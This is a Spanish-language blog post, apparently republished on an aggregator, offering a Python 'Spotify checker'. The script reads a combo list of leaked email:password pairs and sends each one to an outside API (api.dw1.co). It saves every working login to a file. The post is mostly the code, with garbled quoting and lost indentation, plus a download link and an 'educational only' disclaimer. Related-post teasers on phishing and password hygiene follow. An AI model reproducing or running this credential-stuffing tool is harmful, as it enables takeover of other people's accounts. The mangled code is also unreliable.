comunidades

Blue Checker Spotify



Blue Checker: Spotify. Esta herramienta nos permite el verificar que cuentas son correctas e incorrectas en una lista de combos de Spotify.
Es bastante sencilla de usar, solo debes tener una lista de combos en un archivo de texto, y estás cuentas deben estar en el formato correo: contraseña. Una vez tengas el archivo, solo habré la herramienta y pon el nombre del archivo. Una vez hecho esto, el proceso de verificación empezará a correr.

Requisitos

Sistema Operativo linux,termux.

Instalar Python3

Archivo txt combo

git clone https://github.com/Pericena/Scriptpy/blob/master/checker ≪ °° ≫











≪ °° ≫

Código
import requests
import os
def Limpieza():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
def Logo():
print(

[-] Cyber Hacking |[-]
[]
)
def Menu():
orden=0
correo=[]
contraseña=[]
cuentasCorrectas=[]
Limpieza()
Logo()
try:
print("La lista de cuentas a verificar debe encontrarse en el formato correo:contraseña, ademas, el ")
print("archivo en cuestion debe ser un archivo de texto (.txt).")
print()
archivo = input(Nombre del archivo: )
archivoLectura = open(archivo).read().splitlines()
except Exception as f:
print()
print(No se encontro el archivo.)
exit()
Limpieza()
Logo()
print(Analizando el archivo "+archivo+"...)
try:
for separador in archivoLectura:
cuenta = separador.split(":")
correo.append(cuenta[0])
contraseña.append(cuenta[1])
except IndexError:
print()
print("Asegúrese de que todas las cuentas esten en el formato correo:contraseña.")
exit()
print()
print(¡Se cargaron + str(len(archivoLectura)) + cuentas satisfactoriamente!)
print()
print([])
print()
contra = len(contraseña)
while orden < contra:
orden+=1
soli = requests.post(https://api.dw1.co/spotify/v2/check, data={email:correo[orden-1],password:contraseña[orden-1]})
inic = [==============================]\n

with open(CuentasSpotify.txt,a+) as guardar:
if true in soli.text:
cuentasCorrectas.append(correo[orden-1])
guardar.write(inic)
guardar.write(Correo: {}\n.format(correo[orden-1]))
guardar.write(Contraseña: {}\n.format(contraseña[orden-1]))
guardar.close()

print([Cuenta Correcta] -> +correo[orden-1]+ - +contraseña[orden-1])
print()
else:
print([Cuenta Incorrecta] -> +correo[orden-1]+ - +contraseña[orden-1])
print()
print([])
print()
print(Podra encontrar las +str(len(cuentasCorrectas))+ " cuentas correctas en el archivo CuentasSpotify.txt")
print()
print([])
print()
try:
Menu()
except KeyboardInterrupt:
print(\n)
print([])
print()
print(Cerrando programa...)
print() print([])
exit()

Autor :Sources

Descargar
https://github.com/Pericena/Scriptpy/blob/master/checker


------------------------------------------------

Únete a la comunidad Cyber Hacking





ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.

PERMANECE LEGAL. GRACIAS!

Si tienes algún problema, deja un comentario. Follow @LPericena

Luishiño

Hola soy Luishiño estudio la carrera de ing. sistemas y este es mi Blog personal aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática. Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.

Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
¿Qué te ha parecido esta idea?

Esta idea proviene de:

Y estas son sus últimas ideas publicadas:

El día 15 de septiembre una mañana amino recibe muchas peticiones de servicios aun que pueden ser otra las causas como: *Migraciones de servidores *Ataques de ddos *Peticiones de servicios *Soporte o ...

El objetivo de los CTF es lograr resolver la mayor cantidad de retos posibles, obteniendo una flag (Solución a un reto), entre los cuáles, se suelen encontrar retos de criptografía, ingeniería inversa ...

Recomendamos

Relacionado

tutorial

El proceso de recuperación de contraseña en Windows 10, es bastante similar al de Windows 8, sólo que tiene algunos ajustes y pequeñas diferencias, que no son tan complicadas. Por eso aquí te daremos los métodos a utilizar para recuperar tu contraseña. Utilizar la herramienta de restablecimiento de contraseña para cuentas de Microsoft Live La primera opción y una de las obvias, es la de utilizar l ...

documentos error Autores ...

Cuentas de redes sociales usando un ataque de phishing El phishing es uno de los mejores ataques de ingeniería social que implica la recopilación de información confidencial y confidencial del objetivo, por ejemplo La tarjeta de crédito, la tarjeta de débito, la contraseña bancaria y la contraseña de las redes sociales. En este método, el atacante clona el sitio web oficial específico y lo envía a ...

Seguridad Informática

Importancia de una contraseña segura Todos entendemos la importancia de contar con una buena contraseña. Actúa como última barrera frente a virus y piratas informáticos que están deseando husmear en tus archivos y cuentas personales. Por lo tanto, es de entender que no queramos que NADIE la pueda descifrar. Se han robado infinidad de cuentas bancarias, muchas identidades han logrado ser clonadas, ...

La página de inicio de sesión estándar utiliza un script simple para pasar sus credenciales de inicio de sesión (nombre de usuario y contraseña) al servidor de correo. Es posible que si alguien intercepta esta transmisión de paquetes, el nombre de usuario y la contraseña se verían comprometidos. La página de inicio de sesión seguro utiliza una capa de sockets seguros (SSL) para cifrar el nombre de ...

Computación Software ciberseguridad ...

Habitualmente, oímos a personas preguntarse ¿Por qué usar un gestor de contraseñas? La gran mayoría confía plenamente en las contraseñas que crean para sus dispositivos o cuentas virtuales, pero ciertamente por más que se esfuercen no siempre son del todo infalible. Un gestor de contraseña por otro lado es una herramienta que puede ayudarnos a ponerle las cosas un tanto más difícil a los hacker qu ...

Linux

Entre mis varias cuentas de correo electrónico (4), sitios de redes sociales (3), mi blog personal, los diversos juegos en línea a los que juego (3), el acceso a las aplicaciones web de mi trabajo (2), la contraseña de autenticación de la computadora, la banca en línea (4), los clientes de mensajería instantánea (4), y otros varios inicios de sesión para comentar en otros blogs y sitios diversos c ...

Noticias Tecnologia Seguridad ...

7 de cada 10 usuarios utilizan la misma contraseña para diferentes cuentas de correo electrónico. Se prevé que para 2022 las ofertas de trabajo en ciberseguridad se tripliquen. Hace unos días se hacía publica la noticia de que cerca de 800 millones de direcciones de correo electrónico habían sido hackeadas en una operación, denominada Collection #1 que supondría el mayor robo de datos de la histor ...

gmail gmail correo electronico gmail iniciar sesion

En la época actual las cuentas de correo electrónico se han convertido en mucho más que una herramienta de comunicación, ya para hoy en día se han vuelto realmente indispensables para lograr un adecuado manejo de todo tipo de información que millones de personas envían y reciben a diario, el uso de estas cuentas actualmente es de un alto porcentaje puesto que permite optimizar el tiempo tanto en i ...

atienza cursos onda cero

Un truco para tener una contraseña segura para nuestras cuentas en internet se basa en usar una sencilla regla nemotécnica que es la siguiente El primer paso es pensar en palabras que estén asociadas a nombres que sean fáciles de recordar para nosotros, por ejemplo: · Una canción que nos guste · Una ciudad o pueblo · Un nombre propio · El nombre de nuestra pareja, ...

cache contraseña cookies ...

Las cookies son unas herramientas que, en conjunto con el historial de navegación, se encargan de acelerar las sesiones de los usuarios en los navegadores web. Sin embargo, también, pueden llegar a representar una amenaza. Ya que los hackers podrían hacer uso de ellas para acceder a todas tus cuentas y robar tu información personal. Es por ello que, con regularidad, deberías borrar las cookies, el ...